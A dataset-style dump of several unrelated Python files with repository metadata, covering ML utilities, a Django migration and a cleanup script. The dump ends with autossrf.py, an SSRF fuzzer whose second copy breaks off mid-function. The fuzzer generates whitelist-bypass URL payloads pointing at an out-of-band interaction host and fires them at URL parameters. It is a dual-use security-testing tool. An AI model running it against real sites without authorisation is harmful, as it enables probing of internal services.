bark/runtime/scenario/scenario_generation/config_readers/__init__.py
|
GAIL-4-BARK/bark
|
1cfda9ba6e9ec5318fbf01af6b67c242081b516e
|
[
"MIT"
] | 1
|
2020-08-12T17:09:05.000Z
|
2020-08-12T17:09:05.000Z
|
# Copyright (c) 2020 Julian Bernhard, Klemens Esterle, Patrick Hart and
# Tobias Kessler
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
from .agent_state_geometry_config_readers import *
from .behavior_model_config_readers import *
from .controlled_agents_config_readers import *
from .dynamic_model_config_readers import *
from .execution_model_config_readers import *
from .goal_definition_config_readers import *
| 40.666667
| 71
| 0.817623
|
from .agent_state_geometry_config_readers import *
from .behavior_model_config_readers import *
from .controlled_agents_config_readers import *
from .dynamic_model_config_readers import *
from .execution_model_config_readers import *
from .goal_definition_config_readers import *
| true
| true
|
f70b487dbf13fd67d8c1b8771e80901c74c097de
| 2,633
|
py
|
Python
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-12-02T18:56:49.000Z
|
2020-03-14T17:14:15.000Z
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-09-11T23:11:48.000Z
|
2019-11-29T06:04:52.000Z
|
scripts/clean.py
|
aman-roy/oppia
|
0e7066829b59bf6ce4b15c4723fe0398721cfd1a
|
[
"Apache-2.0"
] | 2
|
2019-12-02T18:56:56.000Z
|
2020-03-16T08:03:45.000Z
|
# Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Deletes temporary and installed files."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import os
import shutil
import python_utils
CURR_DIR = os.path.abspath(os.getcwd())
OPPIA_TOOLS_DIR = os.path.join(CURR_DIR, '..', 'oppia_tools')
_PARSER = argparse.ArgumentParser(description="""
Deletes temporary and installed files.
""")
def delete_directory_tree(directory_path):
"""Recursively delete an existing directory tree. Does not do anything if
directory does not exists.
Args:
directory_path: str. Directory path to be deleted.
"""
if not os.path.exists(directory_path):
return
shutil.rmtree(directory_path)
def delete_file(filepath):
"""Delete an existing file. Does not do anything if file does not exists.
Args:
filepath: str. Filepath to be deleted.
"""
if not os.path.isfile(filepath):
return
os.remove(filepath)
def main(args=None):
"""Runs the script to clean temporary and installed files."""
unused_parsed_args = _PARSER.parse_args(args=args)
delete_directory_tree(OPPIA_TOOLS_DIR)
delete_directory_tree('node_modules/')
delete_directory_tree('third_party/')
delete_directory_tree('build/')
delete_directory_tree('backend_prod_files/')
delete_file('.coverage')
delete_directory_tree('local_compiled_js/')
delete_directory_tree('local_compiled_js_for_test/')
delete_file('tsc_output_log.txt')
delete_file('dev_output.txt')
delete_file('.viminfo')
for filename in os.listdir(CURR_DIR):
if filename.startswith('tmpcompiledjs'):
delete_directory_tree(filename)
python_utils.PRINT('Temporary and installed files deleted')
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when clean.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
| 31.345238
| 79
| 0.734523
|
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import os
import shutil
import python_utils
CURR_DIR = os.path.abspath(os.getcwd())
OPPIA_TOOLS_DIR = os.path.join(CURR_DIR, '..', 'oppia_tools')
_PARSER = argparse.ArgumentParser(description="""
Deletes temporary and installed files.
""")
def delete_directory_tree(directory_path):
if not os.path.exists(directory_path):
return
shutil.rmtree(directory_path)
def delete_file(filepath):
if not os.path.isfile(filepath):
return
os.remove(filepath)
def main(args=None):
unused_parsed_args = _PARSER.parse_args(args=args)
delete_directory_tree(OPPIA_TOOLS_DIR)
delete_directory_tree('node_modules/')
delete_directory_tree('third_party/')
delete_directory_tree('build/')
delete_directory_tree('backend_prod_files/')
delete_file('.coverage')
delete_directory_tree('local_compiled_js/')
delete_directory_tree('local_compiled_js_for_test/')
delete_file('tsc_output_log.txt')
delete_file('dev_output.txt')
delete_file('.viminfo')
for filename in os.listdir(CURR_DIR):
if filename.startswith('tmpcompiledjs'):
delete_directory_tree(filename)
python_utils.PRINT('Temporary and installed files deleted')
if __name__ == '__main__':
main()
| true
| true
|
f70b4945227d811eedda76780bd668eab187029e
| 2,622
|
py
|
Python
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-01-11T07:14:37.000Z
|
2022-01-11T07:14:37.000Z
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-03-04T07:19:43.000Z
|
2022-03-04T07:19:43.000Z
|
model_measuring/kamal/core/engine/events.py
|
Gouzhong1223/Dubhe
|
8959a51704410dc38b595a0926646b9928451c9a
|
[
"Apache-2.0"
] | 1
|
2022-03-20T13:09:14.000Z
|
2022-03-20T13:09:14.000Z
|
"""
Copyright 2020 Tianshu AI Platform. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================
"""
from typing import Callable, Optional
from enum import Enum
class Event(object):
def __init__(self, value: str, event_trigger: Optional[Callable]=None ):
if event_trigger is None:
event_trigger = Event.default_trigger
self._trigger = event_trigger
self._name_ = self._value_ = value
@property
def trigger(self):
return self._trigger
@property
def name(self):
"""The name of the Enum member."""
return self._name_
@property
def value(self):
"""The value of the Enum member."""
return self._value_
@staticmethod
def default_trigger(engine):
return True
@staticmethod
def once_trigger():
is_triggered = False
def wrapper(engine):
if is_triggered:
return False
is_triggered=True
return True
return wrapper
@staticmethod
def every_trigger(every: int):
def wrapper(engine):
return every>0 and (engine.state.iter % every)==0
return wrapper
def __call__(self, every: Optional[int]=None, once: Optional[bool]=None ):
if every is not None:
assert once is None
return Event(self.value, event_trigger=Event.every_trigger(every) )
if once is not None:
return Event(self.value, event_trigger=Event.once_trigger() )
return Event(self.value)
def __hash__(self):
return hash(self._name_)
def __eq__(self, other):
if hasattr(other, 'value'):
return self.value==other.value
else:
return
class DefaultEvents(Event, Enum):
BEFORE_RUN = "before_train"
AFTER_RUN = "after_train"
BEFORE_EPOCH = "before_epoch"
AFTER_EPOCH = "after_epoch"
BEFORE_STEP = "before_step"
AFTER_STEP = "after_step"
BEFORE_GET_BATCH = "before_get_batch"
AFTER_GET_BATCH = "after_get_batch"
| 28.5
| 79
| 0.637681
|
from typing import Callable, Optional
from enum import Enum
class Event(object):
def __init__(self, value: str, event_trigger: Optional[Callable]=None ):
if event_trigger is None:
event_trigger = Event.default_trigger
self._trigger = event_trigger
self._name_ = self._value_ = value
@property
def trigger(self):
return self._trigger
@property
def name(self):
return self._name_
@property
def value(self):
return self._value_
@staticmethod
def default_trigger(engine):
return True
@staticmethod
def once_trigger():
is_triggered = False
def wrapper(engine):
if is_triggered:
return False
is_triggered=True
return True
return wrapper
@staticmethod
def every_trigger(every: int):
def wrapper(engine):
return every>0 and (engine.state.iter % every)==0
return wrapper
def __call__(self, every: Optional[int]=None, once: Optional[bool]=None ):
if every is not None:
assert once is None
return Event(self.value, event_trigger=Event.every_trigger(every) )
if once is not None:
return Event(self.value, event_trigger=Event.once_trigger() )
return Event(self.value)
def __hash__(self):
return hash(self._name_)
def __eq__(self, other):
if hasattr(other, 'value'):
return self.value==other.value
else:
return
class DefaultEvents(Event, Enum):
BEFORE_RUN = "before_train"
AFTER_RUN = "after_train"
BEFORE_EPOCH = "before_epoch"
AFTER_EPOCH = "after_epoch"
BEFORE_STEP = "before_step"
AFTER_STEP = "after_step"
BEFORE_GET_BATCH = "before_get_batch"
AFTER_GET_BATCH = "after_get_batch"
| true
| true
|
f70b494729d59f0ef0996b3eb8e1b49262383183
| 773
|
py
|
Python
|
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
scripts/run_pipeline.py
|
VIDA-NYU/alphad3m
|
db40193a448300d87442c451f9da17fa5cb845fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import json
import os
import sys
import uuid
from alphad3m.automl import AutoML
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.stderr.write('Usage: %s <config> <pipeline_uuid>\n' % sys.argv[0])
sys.exit(1)
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
storage = config['temp_storage_root']
ta2 = AutoML(storage_root=storage,
pipelines_considered=os.path.join(storage, 'pipelines_considered'),
executables_root=os.path.join(storage, 'executables'))
result = ta2.run_pipeline(uuid.UUID(hex=sys.argv[2]),
config['training_data_root'],
config['problem_root'])
print(result)
| 28.62963
| 84
| 0.615783
|
import json
import os
import sys
import uuid
from alphad3m.automl import AutoML
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.stderr.write('Usage: %s <config> <pipeline_uuid>\n' % sys.argv[0])
sys.exit(1)
with open(sys.argv[1]) as config_file:
config = json.load(config_file)
storage = config['temp_storage_root']
ta2 = AutoML(storage_root=storage,
pipelines_considered=os.path.join(storage, 'pipelines_considered'),
executables_root=os.path.join(storage, 'executables'))
result = ta2.run_pipeline(uuid.UUID(hex=sys.argv[2]),
config['training_data_root'],
config['problem_root'])
print(result)
| true
| true
|
f70b4ab8b24b3c82f5dfd1e583d98ca16d2fb009
| 2,358
|
py
|
Python
|
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/optim_test.py
|
liutongyu0304/smartnet
|
6c720165d3222366864163b39f0e2ba7db64253f
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
| 24.309278
| 64
| 0.522477
|
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
| true
| true
|
f70b4acf7cbf3a28a8bfb59275fed813316b0317
| 709
|
py
|
Python
|
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | null | null | null |
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | 20
|
2019-06-17T11:01:25.000Z
|
2020-05-09T06:13:17.000Z
|
app/users/migrations/0007_auto_20190803_0831.py
|
S3Infosoft/mvr-insights
|
ac73feff03c1592d5efd8e0b82f72dd4dbd3e921
|
[
"MIT"
] | 1
|
2020-03-03T11:13:57.000Z
|
2020-03-03T11:13:57.000Z
|
# Generated by Django 2.2.4 on 2019-08-03 08:31
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
| 28.36
| 122
| 0.634697
|
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
| true
| true
|
f70b4d49fd7c2428414fde8a0fcb3a392c5d7289
| 7,023
|
py
|
Python
|
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | 1
|
2022-03-25T07:20:49.000Z
|
2022-03-25T07:20:49.000Z
|
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
deepsim/deepsim/core/link_state.py
|
aws-deepracer/deepsim
|
cad2639f525c2f94ec5c03d8b855cc65b0b8ee55
|
[
"Apache-2.0"
] | null | null | null |
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for link state."""
from typing import Optional
from deepsim.core.pose import Pose
from deepsim.core.twist import Twist
from gazebo_msgs.msg import LinkState as ROSLinkState
class LinkState:
"""
LinkState class
"""
def __init__(self,
link_name: Optional[str] = None,
pose: Optional[Pose] = None,
twist: Optional[Twist] = None,
reference_frame: Optional[str] = None):
"""
Initialize LinkState class
Args:
link_name (Optional[str]): link name
pose (Optional[Pose]): desired pose in reference frame
twist (Optional[Twist]): desired twist in reference frame
reference_frame (Optional[str]): set pose/twist relative to the frame of this entity (Body/Model)
leave empty or "world" or "map" defaults to world-frame
"""
self._link_name = link_name
self._pose = pose.copy() if pose else Pose()
self._twist = twist.copy() if twist else Twist()
self._reference_frame = reference_frame or ''
@property
def link_name(self) -> str:
"""
Returns the link name
Returns:
str: link name
"""
return self._link_name
@link_name.setter
def link_name(self, value: str) -> None:
"""
Set link name
Args:
value (str): link name
"""
self._link_name = value
@property
def pose(self) -> Pose:
"""
Returns the copy of pose.
Returns:
Pose: the copy of pose of the link
"""
return self._pose.copy()
@pose.setter
def pose(self, value: Pose) -> None:
"""
Set the pose.
Args:
value (Pose): the pose
"""
self._pose = value.copy()
@property
def twist(self) -> Twist:
"""
Return the copy of twist.
Returns:
Twist: the copy of twist
"""
return self._twist.copy()
@twist.setter
def twist(self, value: Twist) -> None:
"""
Set the twist.
Args:
value (Twist): the twist
"""
self._twist = value.copy()
@property
def reference_frame(self) -> str:
"""
Returns the reference frame
Returns:
str: the reference frame
"""
return self._reference_frame
@reference_frame.setter
def reference_frame(self, value: str) -> None:
"""
Set the reference frame
Args:
value (str): the reference frame
"""
self._reference_frame = value
def to_ros(self) -> ROSLinkState:
"""
Return the ROS LinkState object created from this link state.
Returns:
gazebo_msgs.msg.LinkState: ROS LinkState
"""
ros_link_state = ROSLinkState()
if self.link_name:
ros_link_state.link_name = self.link_name
if self._pose:
ros_link_state.pose = self._pose.to_ros()
if self._twist:
ros_link_state.twist = self._twist.to_ros()
if self.reference_frame:
ros_link_state.reference_frame = self.reference_frame
return ros_link_state
@staticmethod
def from_ros(value: ROSLinkState) -> 'LinkState':
"""
Returns new LinkState object created from ROS LinkState
Args:
value (ROSLinkState): ROS LinkState
Returns:
LinkState: new LinkState object created from ROS LinkState
"""
return LinkState(link_name=value.link_name,
pose=Pose.from_ros(value.pose),
twist=Twist.from_ros(value.twist),
reference_frame=value.reference_frame)
def copy(self) -> 'LinkState':
"""
Returns a copy.
Returns:
LinkState: the copied link state
"""
return LinkState(link_name=self.link_name,
pose=self._pose,
twist=self._twist,
reference_frame=self.reference_frame)
def __eq__(self, other: 'LinkState') -> bool:
"""
Equality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: True if the differences of all components are within epsilon, Otherwise False.
"""
return (self.link_name == other.link_name and self.reference_frame == other.reference_frame
and self._pose == other._pose and self._twist == other._twist)
def __ne__(self, other: 'LinkState') -> bool:
"""
Inequality of points is inequality of any coordinates
Args:
other (LinkState): other to compare
Returns:
bool: False if the differences of all components are within epsilon, Otherwise True.
"""
return not self.__eq__(other)
def __str__(self) -> str:
"""
String representation of a link state
Returns:
str: String representation of a link state
"""
return "(link_name=%s, pose=%s, twist=%s, reference_frame=%s)" % (self.link_name,
repr(self._pose),
repr(self._twist),
self.reference_frame)
def __repr__(self) -> str:
"""
String representation including class
Returns:
str: String representation including class
"""
return "LinkState" + str(self)
| 31.922727
| 109
| 0.508472
| true
| true
|
|
f70b4e07bb9dc2e5dc2154f42b695e18f69be121
| 8,395
|
py
|
Python
|
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | null | null | null |
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | null | null | null |
autossrf.py
|
Th0h0/autossrf
|
17125339c395ffaef7d6a58ba234fad53d172885
|
[
"MIT"
] | 1
|
2022-03-26T14:21:59.000Z
|
2022-03-26T14:21:59.000Z
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = '(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
| 34.690083
| 379
| 0.657177
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
